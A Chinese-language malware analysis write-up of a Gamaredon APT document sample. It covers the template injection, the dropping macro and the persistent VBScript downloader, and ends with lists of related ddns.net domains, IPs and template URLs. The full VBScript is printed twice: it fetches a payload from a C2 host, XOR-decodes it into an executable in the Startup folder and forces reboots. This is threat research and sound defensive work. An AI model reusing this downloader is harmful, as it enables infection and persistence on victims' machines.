标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2575]   作者: ecawen 发表于: [2020-02-10]

本文共 [624] 位读者顶过

0x00 前言

在样本分析的过程中,其实很难捕获到一次完整的攻击过程,由于攻击者C2的存活周期通常不长,有时候只有几天,有时候一星期,更长一点的可能半个月左右,当攻击事件中至关重要的C2关停之后,就只能从手里已经获取到的样本进行一个分析,能多的数据就只能靠猜,或者靠开源的威胁情报去寻找踪迹。昨天下午的时候,在星球看到了一个Gamaredon APT相关的hash,于是就稍微分析了一下,由于环境问题,导致很多关联的文件只能通过Google或者vt去找,也就随便写写,分享一下。

 

攻击流程大概如下:[出自:jiwo.org]
图片描述

 

样本hash:4778869cf2564b14b6bbf4baf361469a
拿到一个样本,第一件事应该是确定该样本属于哪类
我的做法一般是先拖到winhex中查看一下文件头什么的:
图片描述

 

这里看起来是一个压缩格式的文档,由后面的item1.xml可以推测应该是office2007之后的office文档
既然基本上确定是office文档了,尝试解压一下看看:
图片描述

 

根据以前的文档分析,这里应该是一个docx文档
更名为docx并使用office2013打开
看样子是个典型的模板注入
这里请求的地址较断,在这个页面就可以直接看到完整请求地址:
http://yotaset.ddns.net/yota.dot
图片描述

0x01 分析

文档内容

看一下文档内容:
图片描述

 

嗯 和网上之前曝光的Gamaredon组织的内容有点类似
在文档最后,留了一个电话和gmail邮箱,也稍微记录一下,万一有用呢
+380977269510, tiamoanni@gmail.com
图片描述

下载dot文件

换个电脑请求一下出现的地址:
图片描述

 

页面长这样,内容大概是说页面访问不了啥的
抱着一个怀疑的态度,暂时先考虑从其他地方去找这个yota.dot文件
尝试直接在vt上搜索yota.dot
图片描述

 

好像没有东西,那尝试搜索http://yotaset.ddns.net/yota.dot
图片描述

 

看到上传时间是七天前,应该是本次攻击所对应的
查看DETAILS选项:
图片描述

 

那么这个文件应就是目标dot了:
图片描述

 

下载到本地:
图片描述

分析dot

将下载的文件添加dot后缀,word打开:
图片描述

 

是一个空白的带宏代码的文档。
宏代码长如下这样:
图片描述

 

从上往下看,程序首先是创建了两个对象

1
2
3
Dim uKSUBtGo
uKSUBtGo = "Set WShell=CreateObject(""WSc" + "ri" + "pt.S" + "hel" + "l"")"
Set vfKtZARk = CreateObject("WScr" + "ipt.Ne" + "two" + "rk")

wscript.shell
wscript.Network
应该分别用于执行shell以及网络请求的

 

然后通过代码创建Scripting.FileSystemObject对象以提供对文件系统的访问

1
Set wEDMwGJH = CreateObject("Sc" + "rip" + "ting.Fi" + "leSy" + "stemOb" + "ject")

接着Shellcode获取了用户计算机的信息,然后进行转换并拼接到后面的一个请求地址中
图片描述

 

请求地址拼接出来如下:
"http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php"
其中WIN-IHN30SD7IMB_9AC9AA87是计算机的标识

 

获取用户环境变量,后续应该会基于该路径释放文件

1
AppPaths = Environ("Appdata")

声明了两个路径,这两个路径后面会拼接到释放的文件中
图片描述

 

接着写入了两个注册表键值
而设置该键是为了将宏标记为安全
图片描述

 

最后就是一大串的AZSmCKHa.Write,通常来说会写入三种类型的文件,vb powershell 和js
稍微调一下代码,就可以得知恶意代码执行后会在
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
目录下释放security.vbs文件

 

图片描述

 

写入完成:
图片描述

释放的VB分析

先跑一下这个vbs的行为,由于vbs都是调用windows的wscript.exe执行的,这里直接监视wscript.exe即可
图片描述

 

可以看到,Shellcode在执行过程中,不断的向%APPDATA%目录写入文件,随后又删除。
生成的文件名都是随机字符串
以及遍历文件列表的行为:
图片描述

 

行为摸了一下,接下来看具体的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
Function CLDCvmeg(xhmjPnsk)
On Error Resume Next
Set GHPiNqEA = CreateObject("MSXML2.XMLHTTP")
With GHPiNqEA
.Open "GET", xhmjPnsk, False
.send
End With
If GHPiNqEA.Status = 200 Then
CLDCvmeg = GHPiNqEA.ResponseBody
End If
End Function
Function Encode( KWKhBKJb, QuByZuyg, zgVWzifW )
Dim UIzlfDOE, sRMmQeTH, LVFaTeVS, JKCjSZfP, nLGKrzOK, WDDOZIip
Const ForAppending =  8
Const ForReading =  1
Const ForWriting =  2
Const TristateFalse =  0
Const TristateMixed = -2
Const TristateTrue = -1
Const TristateUseDefault = -2
On Error Resume Next
If Not IsArray( zgVWzifW ) Then
zgVWzifW = Array( zgVWzifW )
End If
For UIzlfDOE = 0 To UBound( zgVWzifW )
If Not IsNumeric( zgVWzifW(i) ) Then
Encode = 1032
Exit Function
End If
If zgVWzifW(UIzlfDOE) < 0 Or zgVWzifW(UIzlfDOE) > 255 Then
Encode = 1031
Exit Function
End If
Next
Set sRMmQeTH = CreateObject( "Scripting.FileSystemObject" )
If sRMmQeTH.FileExists( KWKhBKJb ) Then
Set LVFaTeVS   = sRMmQeTH.GetFile( KWKhBKJb )
Set nLGKrzOK = LVFaTeVS.OpenAsTextStream( ForReading, TriStateFalse )
Else
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set sRMmQeTH = Nothing
Exit Function
End If
If sRMmQeTH.FileExists( QuByZuyg ) Then
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
If sRMmQeTH.Fileexists( KWKhBKJb) Then sRMmQeTH.DeleteFile  KWKhBKJb
Set sRMmQeTH = Nothing
Exit Function
Else
Set JKCjSZfP = sRMmQeTH.CreateTextFile( QuByZuyg, True, False )
End If
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
For UIzlfDOE = 0 To UBound( zgVWzifW )
UIzlfDOE + 1 mod ( UBound( zgVWzifW ))
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(UIzlfDOE) )
if nLGKrzOK.AtEndOfStream Then Exit Do
Next
Loop
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream 
UIzlfDOE = ( UIzlfDOE + 1 ) \ ( UBound( zgVWzifW ) + 1 )
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(WDDOZIip) )
UIzlfDOE=UIzlfDOE+1
If WDDOZIip<UBound( zgVWzifW ) Then
WDDOZIip=WDDOZIip+1
else WDDOZIip=0
End If
Loop
JKCjSZfP.Close
If sRMmQeTH.Fileexists(KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS   = Nothing
Set JKCjSZfP  = Nothing
Set sRMmQeTH      = Nothing
On Error Goto 0
End Function
Function GetMxUZhZHN( JVVqpSiS )
Dim UIzlfDOE, zgVWzifW( )
ReDim zgVWzifW( Len( JVVqpSiS ) - 1 )
For UIzlfDOE = 0 To UBound( zgVWzifW )
zgVWzifW(UIzlfDOE) = Asc( Mid( JVVqpSiS, UIzlfDOE + 1, 1 ) )
Next
GetMxUZhZHN = zgVWzifW
End Function
Function JGFAPnao(ByVal qqKtOALe)
Dim VIkwJSQM
Const yJEHBKZk = "abcdefghijklmnopqrstuvwxyz0123456789"
Randomize
For UIzlfDOE = 1 To qqKtOALe
VIkwJSQM = VIkwJSQM & Mid(yJEHBKZk, Int(36 * Rnd + 1), 1)
Next
JGFAPnao = VIkwJSQM
End Function
Sub save(data)
Dim IDrBJtww
IDrBJtww = "1"
IDrBJtww = JGFAPnao(5)
Set VSvGvYGC = CreateObject("Scripting.FileSystemObject")
Set xIrnqUVA = CreateObject("ADODB.Stream")
On Error Resume Next
xIrnqUVA.Open
xIrnqUVA.Type = 1
xIrnqUVA.Write (data)
xIrnqUVA.Position = 0
Set VSvGvYGC = Nothing
xIrnqUVA.SaveToFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
xIrnqUVA.Close
WScript.Sleep 7273
Set yBfuPFFD = CreateObject("Scripting.FileSystemObject")
Set FBwpkCFY = yBfuPFFD.GetFile("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt")
If FBwpkCFY.Size < 12425 Then FBwpkCFY.Delete
Dim arrMxUZhZHN, oBsaEHDX
arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87")
oBsaEHDX = Encode( "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+IDrBJtww+".exe", arrMxUZhZHN )
WScript.Sleep 6425
If oBsaEHDX <> 0 Then
End If
End Sub
pKeIwNCN = 1
Do While pKeIwNCN > 0
WScript.Sleep 181244
save CLDCvmeg("http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php")
Dim YWZxbTGp, dIisjAUJ, JgEairIr, VSvGvYGC
Set CDDtmtsF = CreateObject("Scripting.FileSystemObject")
YWZxbTGp = CDDtmtsF.GetParentFolderName(WScript.ScriptFullName)
With WScript.CreateObject("Scripting.FileSystemObject")
Set sRMmQeTH = CreateObject("Scripting.FileSystemObject")
If sRMmQeTH.Fileexists("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt") Then sRMmQeTH.DeleteFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
JgEairIr = 0
For Each dIisjAUJ In .GetFolder(YWZxbTGp).Files
If UCase(.GetExtensionName(dIisjAUJ.Name)) = UCase("exe") Then
JgEairIr = JgEairIr + 1
End If
Next
If (JgEairIr > 2) Then
Dim YncDXDKj, BLxBKzNR, BLxBKzNRSheck
Set YncDXDKj = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Set BLxBKzNR = YncDXDKj.Instances_
For Each BLxBKzNRSheck In BLxBKzNR
BLxBKzNRSheck.Reboot()
Next
End If
End With
Loop

这个代码咋一看很吓人,不太清楚入口点在哪里,其实这样的代码,通常情况下入口点在最下面
这里的代码由多个function和sub组成,把这些function和sub分开,代码将会如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
Function CLDCvmeg(xhmjPnsk)
On Error Resume Next
Set GHPiNqEA = CreateObject("MSXML2.XMLHTTP")
With GHPiNqEA
.Open "GET", xhmjPnsk, False
.send
End With
If GHPiNqEA.Status = 200 Then
CLDCvmeg = GHPiNqEA.ResponseBody
End If
End Function
 
 
Function Encode( KWKhBKJb, QuByZuyg, zgVWzifW )
Dim UIzlfDOE, sRMmQeTH, LVFaTeVS, JKCjSZfP, nLGKrzOK, WDDOZIip
Const ForAppending =  8
Const ForReading =  1
Const ForWriting =  2
Const TristateFalse =  0
Const TristateMixed = -2
Const TristateTrue = -1
Const TristateUseDefault = -2
On Error Resume Next
If Not IsArray( zgVWzifW ) Then
zgVWzifW = Array( zgVWzifW )
End If
For UIzlfDOE = 0 To UBound( zgVWzifW )
If Not IsNumeric( zgVWzifW(i) ) Then
Encode = 1032
Exit Function
End If
If zgVWzifW(UIzlfDOE) < 0 Or zgVWzifW(UIzlfDOE) > 255 Then
Encode = 1031
Exit Function
End If
Next
Set sRMmQeTH = CreateObject( "Scripting.FileSystemObject" )
If sRMmQeTH.FileExists( KWKhBKJb ) Then
Set LVFaTeVS   = sRMmQeTH.GetFile( KWKhBKJb )
Set nLGKrzOK = LVFaTeVS.OpenAsTextStream( ForReading, TriStateFalse )
Else
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set sRMmQeTH = Nothing
Exit Function
End If
If sRMmQeTH.FileExists( QuByZuyg ) Then
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
If sRMmQeTH.Fileexists( KWKhBKJb) Then sRMmQeTH.DeleteFile  KWKhBKJb
Set sRMmQeTH = Nothing
Exit Function
Else
Set JKCjSZfP = sRMmQeTH.CreateTextFile( QuByZuyg, True, False )
End If
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
For UIzlfDOE = 0 To UBound( zgVWzifW )
UIzlfDOE + 1 mod ( UBound( zgVWzifW ))
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(UIzlfDOE) )
if nLGKrzOK.AtEndOfStream Then Exit Do
Next
Loop
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream 
UIzlfDOE = ( UIzlfDOE + 1 ) \ ( UBound( zgVWzifW ) + 1 )
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(WDDOZIip) )
UIzlfDOE=UIzlfDOE+1
If WDDOZIip<UBound( zgVWzifW ) Then
WDDOZIip=WDDOZIip+1
else WDDOZIip=0
End If
Loop
JKCjSZfP.Close
If sRMmQeTH.Fileexists(KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS   = Nothing
Set JKCjSZfP  = Nothing
Set sRMmQeTH      = Nothing
On Error Goto 0
End Function
 
 
 
Function GetMxUZhZHN( JVVqpSiS )
Dim UIzlfDOE, zgVWzifW( )
ReDim zgVWzifW( Len( JVVqpSiS ) - 1 )
For UIzlfDOE = 0 To UBound( zgVWzifW )
zgVWzifW(UIzlfDOE) = Asc( Mid( JVVqpSiS, UIzlfDOE + 1, 1 ) )
Next
GetMxUZhZHN = zgVWzifW
End Function
 
 
Function JGFAPnao(ByVal qqKtOALe)
Dim VIkwJSQM
Const yJEHBKZk = "abcdefghijklmnopqrstuvwxyz0123456789"
Randomize
For UIzlfDOE = 1 To qqKtOALe
VIkwJSQM = VIkwJSQM & Mid(yJEHBKZk, Int(36 * Rnd + 1), 1)
Next
JGFAPnao = VIkwJSQM
End Function
 
 
Sub save(data)
Dim IDrBJtww
IDrBJtww = "1"
IDrBJtww = JGFAPnao(5)
Set VSvGvYGC = CreateObject("Scripting.FileSystemObject")
Set xIrnqUVA = CreateObject("ADODB.Stream")
On Error Resume Next
xIrnqUVA.Open
xIrnqUVA.Type = 1
xIrnqUVA.Write (data)
xIrnqUVA.Position = 0
Set VSvGvYGC = Nothing
xIrnqUVA.SaveToFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
xIrnqUVA.Close
WScript.Sleep 7273
Set yBfuPFFD = CreateObject("Scripting.FileSystemObject")
Set FBwpkCFY = yBfuPFFD.GetFile("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt")
If FBwpkCFY.Size < 12425 Then FBwpkCFY.Delete
Dim arrMxUZhZHN, oBsaEHDX
arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87")
oBsaEHDX = Encode( "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+IDrBJtww+".exe", arrMxUZhZHN )
WScript.Sleep 6425
If oBsaEHDX <> 0 Then
End If
End Sub
 
 
pKeIwNCN = 1
Do While pKeIwNCN > 0
WScript.Sleep 181244
save CLDCvmeg("http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php")
Dim YWZxbTGp, dIisjAUJ, JgEairIr, VSvGvYGC
Set CDDtmtsF = CreateObject("Scripting.FileSystemObject")
YWZxbTGp = CDDtmtsF.GetParentFolderName(WScript.ScriptFullName)
With WScript.CreateObject("Scripting.FileSystemObject")
Set sRMmQeTH = CreateObject("Scripting.FileSystemObject")
If sRMmQeTH.Fileexists("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt") Then sRMmQeTH.DeleteFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
JgEairIr = 0
For Each dIisjAUJ In .GetFolder(YWZxbTGp).Files
If UCase(.GetExtensionName(dIisjAUJ.Name)) = UCase("exe") Then
JgEairIr = JgEairIr + 1
End If
Next
If (JgEairIr > 2) Then
Dim YncDXDKj, BLxBKzNR, BLxBKzNRSheck
Set YncDXDKj = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Set BLxBKzNR = YncDXDKj.Instances_
For Each BLxBKzNRSheck In BLxBKzNR
BLxBKzNRSheck.Reboot()
Next
End If
End With
Loop

所以执行该脚本,代码实际上会从136行,也就是pKeIwNCN = 1开始执行,然后在下面的do Loop循环中对上面的fun进行调用。
在该脚本中,pKeIwNCN只有一次赋值,所以这里是永真循环
图片描述

 

接着程序会将http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php作为参数传递到CLDCvmeg函数中:
图片描述

 

根据CLDCvmeg可得知,程序会尝试通过GET请求对传入进来的域名进行请求,如果请求成功,则将ResponseBody赋值给CLDCvmeg
而该值会作为参数传递到save函数中,在save函数中实现文件的本地保存:
图片描述

 

save函数首先会生成一个长度为5的随机字符,这也解释了在火绒剑中行为检测看到的随机文件名的由来:
图片描述

 

如果文件的大小小于12425,程序就会删除刚才的创建的文件
如果大于12425,说明成功从请求地址中获取到了返回值,程序就会调用Encode函数,而解密的秘钥是上面的arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87"),将这个txt文件转换为exe文件
路径同vbs的释放路径:
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
图片描述

 

接着程序遍历当前vbs执行目录下的所有文件,尝试查找exe文件
图片描述

 

如果找到两个以上的exe文件,程序则会获取到用户计算机最后一次启动时间并将计算机重启。
图片描述

 

现在vbs代码也分析好了,通过对vbs的分析可以知道,该样本最后应该会在本地落地并执行一个exe文件
既然这个exe文件的数据来源是
http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php

 

图片描述
exe这里就不分析了,接下来看看关联分析。

关联分析

首先是查询初始样本的md5,这里可以看到关联了一个域名,两个地址
图片描述

1
2
http://yotaset.ddns.net/yota.dot
http://yotaset.ddns.net/

解析ip为:141.8.195.60
样本最后访问的域名是:korneliuswork.ddns.net
图片描述

 

这里可以看到korneliuswork.ddns.net有两个历史解析ip,分别是
188.225.25.50
2.59.41.5

 

还有一些兄弟节点

 

在最下面可以看到有两条和本次样本格式相同,都是域名+计算机信息+rebootor.php

 

所有的域名如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
liqds.ddns.net    157.230.156.245           
rifloreds.ddns.net    103.63.2.234           
sebastiano.ddns.net    95.252.110.118    87.7.234.104    79.49.225.156     
viewer.ddns.net    113.22.110.254    113.22.108.52    1.55.228.111   
servincnet.ddns.net         51.75.207.74       
maritatdeq.ddns.net         51.68.3.7       
gsae.ddns.net         107.180.50.241       
azomoney.ddns.net         185.136.159.224       
conquer.ddns.net    197.57.70.187    197.57.203.100    197.57.33.182     
pft0.ddns.net    42.2.152.197    1.65.198.132    1.65.206.162     
pft0.ddns.net    42.2.152.197    1.65.198.132    1.65.206.162     
service-paypalinc.ddns.net         62.210.119.140       
icbc-pdc.ddns.net    159.138.11.152           
harryng.ddns.net         105.112.104.181    185.247.228.13     
xtremeratbilubilu.ddns.net         177.45.197.125    201.68.102.203     
appleinc-webserv.ddns.net         134.209.189.165       
isabellehome.ddns.net    82.64.31.82           
evans227.ddns.net         185.165.153.31    194.5.98.19     
sitertg.ddns.net    92.151.31.112    86.238.87.95    82.124.150.35     
yasserexe.ddns.net    105.158.139.53    196.206.123.224    41.142.188.83     
boseburo.ddns.net    79.247.91.19    79.247.86.117    79.247.88.177     
hempelnextcloud.ddns.net    87.144.65.24    93.203.166.179    217.227.255.230     
adsstorepos.ddns.net    201.123.73.13    201.123.20.33    201.123.66.60     
zigf.ddns.net    91.193.75.66           
sterytatoo.ddns.net         191.88.16.185    181.58.16.104     
dbestgroupz.ddns.net    45.143.222.19           
mynetwork.ddns.net         179.43.160.187    5.79.127.177     
monworldidreset.ddns.net         51.75.194.39       
yitfoh.ddns.net    52.139.244.149    52.230.61.128       
btcnode.ddns.net    81.105.101.129           
rmaos.ddns.net    185.62.189.133    197.211.61.129    91.236.116.189   
jsoldnerfl.ddns.net    98.244.254.121           
accontsupdateserv.ddns.net         165.227.39.38       
westfalls.ddns.net    172.12.238.48           
databyte34322.ddns.net         199.192.28.70       
notathome.ddns.net    116.87.80.124    58.182.23.208    27.125.179.20     
tyhhome.ddns.net    121.122.62.61           
takik.ddns.net    153.188.235.250    220.96.125.189    180.27.216.207   
izushuqsinc.ddns.net    174.127.99.145    103.200.6.3       
relushd.ddns.net    126.99.225.57    126.7.225.197    126.51.236.45     
posno.ddns.net    185.225.246.244    78.136.126.162       
electrumx.ddns.net    165.73.105.234    165.73.107.106    102.182.254.126     
binkar.ddns.net    61.5.71.185    36.74.55.132    36.79.234.98     
christos.ddns.net    94.64.3.62           
problemasmentais.ddns.net    181.221.208.245           
host32.ddns.net    69.114.98.32    93.171.214.249    177.54.144.148     
zxz.ddns.net    62.210.187.148    190.2.136.120    190.2.136.141   
mywebhost.ddns.net    35.187.243.190           
conterprise.ddns.net    95.89.143.8           
popo856.ddns.net    78.199.5.77           
pqhanh.ddns.net    222.150.1.208           
dynupdate.ddns.net    58.158.177.102    91.235.168.230       
136007a.ddns.net    120.157.39.129           
izgemma.ddns.net    188.93.238.18    185.236.230.13    188.93.238.184   
westensee.ddns.net    173.174.180.172           
authentication008f.ddns.net    159.203.114.23           
dfdfddf.ddns.net    31.43.223.111           
pizzo3000.ddns.net    84.226.250.138    89.217.39.89    188.155.110.176   
irfanadi.ddns.net    103.126.226.22           
labeltogo.ddns.net                
hd-proip.ddns.net    185.172.88.14    193.200.164.156    193.200.164.196   
infectingraven.ddns.net    51.89.204.70    77.167.100.196       
arlingford.ddns.net    81.129.197.68    81.153.174.70    86.132.12.91     
disneyadamsfamily.ddns.net    67.174.118.149           
azulnewspromo.ddns.net         108.178.29.162       
itvrus2.ddns.net    149.56.241.228           
molnarek.ddns.net    31.46.49.209           
archimede1.ddns.net    185.38.150.159    5.226.139.5    51.255.95.121     
amfamily6.ddns.net    73.22.174.61           
mcmurphy7777.ddns.net    62.46.90.193    91.114.218.162    91.114.220.75     
snup2019.ddns.net    105.112.115.126    105.112.113.224    105.112.120.121     
zym.ddns.net    119.224.74.65           
swshield.ddns.net    71.63.4.213           
brian-computer.ddns.net    73.80.197.86           
kissmeifucan.ddns.net    197.211.58.82    197.210.28.173    185.244.30.206     
warhola.ddns.net    71.241.240.167    173.73.178.97    71.163.178.47     
boncazmardz.ddns.net    51.68.3.7           
gustaver.ddns.net    37.120.165.226    185.244.194.156    94.16.113.104     
plspdlx.ddns.net    51.68.3.7           
heinrich-fg.ddns.net    84.137.87.95    84.137.89.213    84.137.85.221     
officezd.ddns.net    166.62.28.107           
mchacker66.ddns.net    196.234.204.93    141.255.144.33    196.229.160.98     
claviola.ddns.net    77.248.167.175    62.195.40.231       
accounts-allerts001.ddns.net    157.245.231.137           
bigloop.ddns.net    172.113.5.209           
a2953575.ddns.net    175.180.247.26    175.181.212.179    175.182.99.78     
tengomusica.ddns.net    71.6.201.66           
iptvcolombia.ddns.net    66.240.236.25           
sanvicente46.ddns.net    81.37.111.77           
rdinterationalbrest.ddns.net    107.182.236.81           
jfruhl713.ddns.net    80.108.124.29    62.178.35.113    84.112.139.164   
fastway.ddns.net    62.210.90.216    195.154.178.101    54.39.53.95     
pinetree.ddns.net    116.12.61.63           
tatiefel.ddns.net    95.94.217.80    95.94.214.7    95.93.89.213     
drunkconvert.ddns.net    136.49.131.171           
fredooo.ddns.net    90.112.4.87    2.7.64.17    90.112.225.140     
trasurablog.ddns.net    78.192.44.195           
uc4lnc.ddns.net    185.14.166.35           
suporte-30horas.ddns.net    177.189.7.171    177.139.72.190    187.11.37.120     
23-11-6sgghh.ddns.net    103.27.238.234

关联的dot下载地址如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
http://office-constructor.ddns.net/obce.dot
http://librebooton.ddns.net/booton.dot
http://inbox-office.ddns.net/inbox.dot
http://libre-templates.ddns.net/internet.dot
http://word-gread.ddns.net/gread.dot
http://win-apu.ddns.net/apu.dot
http://office-lite.ddns.net/lite.dot
http://libre-templates.ddns.net/internet.dot
http://office-crash.ddns.net/crash.dot
http://office-out.ddns.net/out.dot
http://libre-templates.ddns.net/internet.dot
http://librebooton.ddns.net/booton.dot
http://micro-set.ddns.net/micro.dot
http://office-constructor.ddns.net/zaput.dot
http://win-ss.ddns.net/ss.dot
http://office-constructor.ddns.net/zaput.dot
http://get-icons.ddns.net/ComputerName_HardDriveSerialNumber//autoindex.php
http://network-crash.ddns.net/
http://network-crash.ddns.net/ComputerName_HardDriveSerialNumber/autoindex.php

评论

暂无
发表评论
 返回顶部 
热度(624)
 关注微信